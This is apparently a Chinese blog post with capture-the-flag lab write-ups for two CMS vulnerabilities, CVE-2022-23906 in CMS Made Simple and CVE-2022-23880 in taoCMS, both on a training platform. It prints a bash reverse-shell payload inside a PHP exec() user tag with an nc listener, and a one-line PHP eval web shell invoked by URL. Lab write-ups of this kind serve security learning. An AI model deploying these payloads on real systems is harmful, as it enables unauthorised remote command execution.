【春秋云境】CVE-2022-23906靶场WP和CVE-2022-23880靶场WP

最新推荐文章于 2023-08-16 16:33:16 发布
最新推荐文章于 2023-08-16 16:33:16 发布
阅读量699 收藏 2
点赞数
分类专栏: 春秋云镜 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/128163296
版权

【春秋云境】CVE-2022-23906靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
2.开启靶场

请添加图片描述

3.登陆后台

  • 后台地址/admin/login.php,账号admin,密码123456

    请添加图片描述

4.找到存在漏洞的位置

  • 扩展–>用户定义标签–>新增自定义标签

    请添加图片描述

5.构造exp

  • 填写名称为glc,添加以下代码

    exec("/bin/bash -c 'bash -i > /dev/tcp/ip/port  0>&1'");

    请添加图片描述

6.反弹shell

  • 在云服务器上安装nc

    yum install -y nc

    请添加图片描述

  • 开启监听端口1234,记得提前把服务器的防火墙规则修改一下

    nc -lnvp 1234

    请添加图片描述

  • 点击run,运行构造的代码,成功反弹shell。然后执行cat /flag

    请添加图片描述

成功获得flag

【春秋云境】CVE-2022-23880靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
2.开启靶场

请添加图片描述

3.登陆后台

  • 后台路径/admin,账号admin:密码tao

    请添加图片描述

4.上传文件

  • 点击文件管理,新建一个名为glc.php的文件,然后点击编辑,放入以下代码,点击保存

    <?php @ eval($_GET["cmd"]) ?>

    请添加图片描述

5.执行命令

  • 访问/glc.php,发现是个空白页面,证明上传成功。咱们构造构造url从而执行命令,获得flag

    /glc.php?cmd=system(%27cat%20/flag%27);

    请添加图片描述

成功获得flag

果粒程1122
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境CVE-2021-34257靶场记录
2301_78019493的博客
05-19 922
WPanel是一个用于构建博客、网站和网络应用程序的CMS。WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传
CVE-2022-23880
m0_51674437的博客
07-23 254
CVE-2022-23880漏洞复现和代码审计
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5266
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
春秋云镜靶场挑战——Tsclient
Cobra的博客
03-25 2607
目标IP:39.98.73.212 网络拓扑 入口机器 1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务) 2、可以先爆破MSSQL服务,如下可以看出成爆破出密码 3、使用MDUT工具连接Mssql 4、使用xp_cmdshell执行命令发现只有一个比较地低的权限 5、使用CS生成木马,利用MDUT上传木马 6、执行木马上线CS C:/Users/Public/beacon.exe 7、使用土豆提
春秋云境CVE-2022-24263靶场WPCVE-2022-24223靶场WP
果粒程
12-01 479
春秋云境CVE-2022-24263靶场WPCVE-2022-24223靶场WP
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2022-37969 Windows 本地权限提升 PoC
08-23
CVE-2022-37969 是通用日志文件系统驱动 clfs 中的越界写入漏洞,通过该漏洞,可以完成提权。 // // Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.  // ...
WP-春秋云镜-Brute4Road靶场通关完全指南
qq_45234543的博客
12-30 2671
春秋云镜-Brute4Road靶场通关指南,完全通关指南手把手教学
CVE-2022-30887漏洞复现
weixin_45177807的博客
11-06 2247
CVE-2022-30887漏洞复现
taoCMS 任意文件上传(CVE-2022-23880
weixin_68999845的博客
08-16 791
Taocms v3.0.2 版本存在安全漏洞,该漏洞源于 taoCMS v3.0.2 File Management 模块存在任意文件上传漏洞。2.点击文件管理,在方框中设置文件名称**(不可点击“上传功能”,此功能会访问本地文件,该部分做了文件类型过滤,无法上传php文件)**1.进入后台(/taocms/admin/admin.php?第96行语句存在任意文件的创建(正常对的业务功能是不允许上传php文件的,但新建功能未对文件后缀做任何处理)Taocms是中国的一个微型 Cms(内容管理系统)。
春秋云境CVE-2022-23880靶场
2301_78019493的博客
05-19 640
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
春秋云镜 CVE-2022-23880
qq_22002773的博客
07-11 139
春秋云镜 CVE-2022-23880
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5504
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
CVE-2022-22965 漏洞复现学习
守拙的博客
04-30 3017
漏洞利用条件 JDK 9+ Spring 及其衍生框架 使用Tomcat部署spring项目 使用了POJO参数绑定 Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本 环境搭建 Java 靶场 JDK 11(必须9及9以上) Tomcat 8 首先需要个实体类 sdf sdf public class HelloWorld { private String message; public String getM
春秋云境CVE-2022-23366靶场WPCVE-2022-23316靶场WP
果粒程
12-04 1078
春秋云境CVE-2022-23366靶场WPCVE-2022-23316靶场WP
CVE-2022-23222 漏洞复现
qq_43472789的博客
06-09 647
2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞,漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,而这将会造成本地提权的风险。由于内核在执行用户提供的 eBPF 程序前缺乏适当的验证,攻击者可以利用这个漏洞获取 root 权限。该漏洞是由于 Linux 内核的 eBPF 验证器存在一个空指针漏洞,没有对*_OR_NULL指针类型进行限制,允许这些类型进行指针运算。
春秋云境CVE-2022-29464
最新发布
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值